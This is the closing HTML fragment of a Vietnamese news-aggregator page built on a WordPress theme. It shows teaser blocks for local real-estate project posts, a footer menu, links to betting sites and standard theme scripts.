dạng. dự... </div> </div> </div> <div class="td_module_16 td_module_wrap td-animation-stack"> <div class="td-module-thumb"><a href="http://bestweightlosspills2015.com/nha-dat/gelexia-riverside-cay-xanh-bao-phu-thoai-mai-nhat.html" rel="bookmark" title="Gelexia Riverside cây xanh bao phủ thoải mái nhất"><img width="100" height="100" class="entry-thumb" src="http://bestweightlosspills2015.com/wp-content/uploads/2017/06/Image-ExtractWord-0-Out-3386-1493020489-150x150.png" alt="" title="Gelexia Riverside cây xanh bao phủ thoải mái nhất"/></a></div> <div class="item-details"> <h3 class="entry-title td-module-title"><a href="http://bestweightlosspills2015.com/nha-dat/gelexia-riverside-cay-xanh-bao-phu-thoai-mai-nhat.html" rel="bookmark" title="Gelexia Riverside cây xanh bao phủ thoải mái nhất">Gelexia Riverside cây xanh bao phủ thoải mái nhất</a></h3> <div class="td-module-meta-info"> <a href="http://bestweightlosspills2015.com/category/nha-dat" class="td-post-category">Nhà đất</a> <span class="td-post-author-name"><a href="http://bestweightlosspills2015.com/author/xuankhanh">xuankhanh</a> <span>-</span> </span> <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2021-05-12T08:00:25+00:00" >12 Tháng Năm, 2021</time></span> <div class="td-module-comments"><a href="http://bestweightlosspills2015.com/nha-dat/gelexia-riverside-cay-xanh-bao-phu-thoai-mai-nhat.html#respond">0</a></div> </div> <div class="td-excerpt"> Dự án Gelexia Riverside chủ đầu tư Tập đoàn Geleximco ưu điểm gần sông sống nhộp nhịp bảo vệ chuyên nghiệp. Căn hộ cao... </div> </div> </div> </div></div> <!-- ./block --> </div> </div> </div> <!-- /.td-pb-row --> </div> <!-- /.td-container --> </div> <!-- /.td-main-content-wrap --> <!-- Instagram --> <!-- Footer --> <div class="td-footer-wrapper td-container-wrap td-footer-template-4 "> <div class="td-container"> <div class="td-pb-row"> <div class="td-pb-span12"> <div class="td-a-rec td-a-rec-id-footer_top "><span class="td-adspot-title">Quảng cáo tại đây</span><div class="td-all-devices"><a href="#"><img src="http://hethongtintuc.com/banner/no-banner-728x90.jpg"/></a></div></div> </div> </div> <div class="td-pb-row"> <div class="td-pb-span12"> <div class="td-footer-info"><div class="footer-logo-wrap"><a href="http://bestweightlosspills2015.com/"><img class="td-retina-data" src="" data-retina="http://baotaolao.net/blogtintuc/wp-content/uploads/2017/04/logo-header@2x.png" alt="" title=""/></a></div><div class="footer-text-wrap"><div class="footer-email-wrap">Liên hệ chúng tôi: <a href="mailto:hethongvetinhtintuc@gmail.com">hethongvetinhtintuc@gmail.com</a></div></div><div class="footer-social-wrap td-social-style-2"> <span class="td-social-icon-wrap"> <a target="_blank" href="#" title="Behance"> <i class="td-icon-font td-icon-behance"></i> </a> </span> <span class="td-social-icon-wrap"> <a target="_blank" href="#" title="Facebook"> <i class="td-icon-font td-icon-facebook"></i> </a> </span> <span class="td-social-icon-wrap"> <a target="_blank" href="#" title="Instagram"> <i class="td-icon-font td-icon-instagram"></i> </a> </span> <span class="td-social-icon-wrap"> <a target="_blank" href="#" title="Twitter"> <i class="td-icon-font td-icon-twitter"></i> </a> </span> <span class="td-social-icon-wrap"> <a target="_blank" href="#" title="Vimeo"> <i class="td-icon-font td-icon-vimeo"></i> </a> </span> <span class="td-social-icon-wrap"> <a target="_blank" href="#" title="VKontakte"> <i class="td-icon-font td-icon-vk"></i> </a> </span></div></div> </div> </div> </div> </div> <!-- Sub Footer --> <div class="td-sub-footer-container td-container-wrap "> <div class="td-container"> <div class="td-pb-row"> <div class="td-pb-span td-sub-footer-menu"> <div class="menu-tin-tuc-container"><ul id="menu-tin-tuc-2" class="td-subfooter-menu"><li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-home menu-item-first td-menu-item td-normal-menu menu-item-11"><a href="http://bestweightlosspills2015.com">Trang chủ</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-5021"><a href="http://bestweightlosspills2015.com/category/suc-khoe">Sức khỏe</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-661"><a href="http://bestweightlosspills2015.com/category/giao-duc">Giáo dục</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-660"><a href="http://bestweightlosspills2015.com/category/du-lich">Du lịch</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-663"><a href="http://bestweightlosspills2015.com/category/oto-xemay">Ôtô- xe máy</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-665"><a href="http://bestweightlosspills2015.com/category/the-thao">Thể thao</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-662"><a href="http://bestweightlosspills2015.com/category/kinh-doanh">Kinh doanh</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor current-menu-parent current-post-parent td-menu-item td-normal-menu menu-item-658"><a href="http://bestweightlosspills2015.com/category/nha-dat">Nhà đất</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-1751"><a href="http://bestweightlosspills2015.com/category/phap-luat">Pháp luật</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-4512"><a href="http://bestweightlosspills2015.com/category/thoi-trang">Thời trang</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-659"><a href="http://bestweightlosspills2015.com/category/cong-nghe">Công nghệ</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-1750"><a href="http://bestweightlosspills2015.com/category/giai-tri">Giải trí</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-5024"><a href="http://bestweightlosspills2015.com/category/noi-ngoai-that">Nội ngoại thất</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-5025"><a href="http://bestweightlosspills2015.com/category/san-pham-dich-vu">Sản phẩm – dịch vụ</a></li> </ul></div> </div> <div class="td-pb-span td-sub-footer-copy"> © Trang tin tức được tổng hợp liên tục hằng ngày từ nhiều nguồn khác nhau. Trang web đang chạy thử nghiệm và chờ xin giấy phép của BTTTT. </br> Link bạn bè: <a href="https://trandau.net/video-clip-tran-dau/" target="_blank" title = "Video clip bóng đá">https://trandau.net/video-clip-tran-dau/</a> <a href="https://linkvaolode88.com" title="Link Vào Nhà Cái Lode88">https://linkvaolode88.com</a> , <a href="https://nhacaiuytin247.com/fabet" title="Link vào nhà cái Fabet - Nha Cai Uy Tin 247">https://nhacaiuytin247.com/fabet</a> , <a href="https://tipkeomoingay.club/tip-bong-da" title="Tip Bóng Đá Miễn Phí - Tip Kèo Mỗi Ngày Club">https://tipkeomoingay.club/tip-bong-da</a> , <a href="https://gamebai.club/" target="_blank" title = "game bài">https://gamebai.club/</a> , <a href="https://truoctran.com/" target="_blank" title = "Truoctran">https://truoctran.com/</a> </div> </div> </div> </div> </div><!--close td-outer-wrap--> <div class="td-more-articles-box"> <i class="td-icon-close td-close-more-articles-box"></i> <span class="td-more-articles-box-title">NHIỀU BÀI VIẾT HƠN</span> <div class="td-content-more-articles-box"> <div class="td_module_6 td_module_wrap td-animation-stack"> <div class="td-module-thumb"><a href="http://bestweightlosspills2015.com/giai-tri/ban-ca-1000-doi-the-online-cuc-hap-dan.html" rel="bookmark" title="Bắn cá 1000 – đổi thẻ online cực hấp dẫn"><img width="100" height="70" class="entry-thumb" src="http://bestweightlosspills2015.com/wp-content/uploads/2021/05/ban-ca-doi-the-ole777-1-100x70.jpg" srcset="http://bestweightlosspills2015.com/wp-content/uploads/2021/05/ban-ca-doi-the-ole777-1-100x70.jpg 100w, http://bestweightlosspills2015.com/wp-content/uploads/2021/05/ban-ca-doi-the-ole777-1-218x150.jpg 218w" sizes="(max-width: 100px) 100vw, 100px" alt="" title="Bắn cá 1000 – đổi thẻ online cực hấp dẫn"/></a></div> <div class="item-details"> <h3 class="entry-title td-module-title"><a href="http://bestweightlosspills2015.com/giai-tri/ban-ca-1000-doi-the-online-cuc-hap-dan.html" rel="bookmark" title="Bắn cá 1000 – đổi thẻ online cực hấp dẫn">Bắn cá 1000 – đổi thẻ online cực hấp dẫn</a></h3> <div class="td-module-meta-info"> <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2021-05-12T13:42:47+00:00" >12 Tháng Năm, 2021</time></span> </div> </div> </div> <div class="td_module_6 td_module_wrap td-animation-stack"> <div class="td-module-thumb"><a href="http://bestweightlosspills2015.com/nha-dat/gem-riverside-vi-tri-trung-tam-view-trai-rong.html" rel="bookmark" title="Gem Riverside vị trí trung tâm view trải rộng"><img width="100" height="70" class="entry-thumb" src="http://bestweightlosspills2015.com/wp-content/uploads/2017/06/Image-ExtractWord-0-Out-3386-1493020489-100x70.png" srcset="http://bestweightlosspills2015.com/wp-content/uploads/2017/06/Image-ExtractWord-0-Out-3386-1493020489-100x70.png 100w, http://bestweightlosspills2015.com/wp-content/uploads/2017/06/Image-ExtractWord-0-Out-3386-1493020489-218x150.png 218w" sizes="(max-width: 100px) 100vw, 100px" alt="" title="Gem Riverside vị trí trung tâm view trải rộng"/></a></div> <div class="item-details"> <h3 class="entry-title td-module-title"><a href="http://bestweightlosspills2015.com/nha-dat/gem-riverside-vi-tri-trung-tam-view-trai-rong.html" rel="bookmark" title="Gem Riverside vị trí trung tâm view trải rộng">Gem Riverside vị trí trung tâm view trải rộng</a></h3> <div class="td-module-meta-info"> <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2021-05-12T09:00:03+00:00" >12 Tháng Năm, 2021</time></span> </div> </div> </div> <div class="td_module_6 td_module_wrap td-animation-stack"> <div class="td-module-thumb"><a href="http://bestweightlosspills2015.com/nha-dat/gelexia-riverside-cay-xanh-bao-phu-thoai-mai-nhat.html" rel="bookmark" title="Gelexia Riverside cây xanh bao phủ thoải mái nhất"><img width="100" height="70" class="entry-thumb" src="http://bestweightlosspills2015.com/wp-content/uploads/2017/06/Image-ExtractWord-0-Out-3386-1493020489-100x70.png" srcset="http://bestweightlosspills2015.com/wp-content/uploads/2017/06/Image-ExtractWord-0-Out-3386-1493020489-100x70.png 100w, http://bestweightlosspills2015.com/wp-content/uploads/2017/06/Image-ExtractWord-0-Out-3386-1493020489-218x150.png 218w" sizes="(max-width: 100px) 100vw, 100px" alt="" title="Gelexia Riverside cây xanh bao phủ thoải mái nhất"/></a></div> <div class="item-details"> <h3 class="entry-title td-module-title"><a href="http://bestweightlosspills2015.com/nha-dat/gelexia-riverside-cay-xanh-bao-phu-thoai-mai-nhat.html" rel="bookmark" title="Gelexia Riverside cây xanh bao phủ thoải mái nhất">Gelexia Riverside cây xanh bao phủ thoải mái nhất</a></h3> <div class="td-module-meta-info"> <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2021-05-12T08:00:25+00:00" >12 Tháng Năm, 2021</time></span> </div> </div> </div> </div> </div> <!-- Theme: Newspaper by tagDiv.com 2017 Version: 7.8.1 (rara) Deploy mode: deploy uid: 609cc4f0d76f6 --> <script type='text/javascript' src='http://bestweightlosspills2015.com/wp-content/themes/Newspaper/js/tagdiv_theme.js?ver=7.8.1'></script> <script type='text/javascript' src='http://bestweightlosspills2015.com/wp-includes/js/comment-reply.min.js?ver=4.9.18'></script> <script type='text/javascript' src='http://bestweightlosspills2015.com/wp-includes/js/wp-embed.min.js?ver=4.9.18'></script> <script async="async" type='text/javascript' src='http://bestweightlosspills2015.com/wp-content/plugins/akismet/_inc/form.js?ver=4.1.6'></script> <!-- JS generated by theme --> <script> (function(){ var html_jquery_obj = jQuery('html'); if (html_jquery_obj.length && (html_jquery_obj.is('.ie8') || html_jquery_obj.is('.ie9'))) { var path = 'http://bestweightlosspills2015.com/wp-content/themes/Newspaper/style.css'; jQuery.get(path, function(data) { var str_split_separator = '#td_css_split_separator'; var arr_splits = data.split(str_split_separator); var arr_length = arr_splits.length; if (arr_length > 1) { var dir_path = 'http://bestweightlosspills2015.com/wp-content/themes/Newspaper'; var splited_css = ''; for (var i = 0; i < arr_length; i++) { if (i > 0) { arr_splits[i] = str_split_separator + ' ' + arr_splits[i]; } //jQuery('head').append('<style>' + arr_splits[i] + '</style>'); var formated_str = arr_splits[i].replace(/\surl\(\'(?!data\:)/gi, function regex_function(str) { return ' url(\'' + dir_path + '/' + str.replace(/url\(\'/gi, '').replace(/^\s+|\s+$/gm,''); }); splited_css += "<style>" + formated_str + "</style>"; } var td_theme_css = jQuery('link#td-theme-css'); if (td_theme_css.length) { td_theme_css.after(splited_css); } } }); } })(); </script> </body> </html>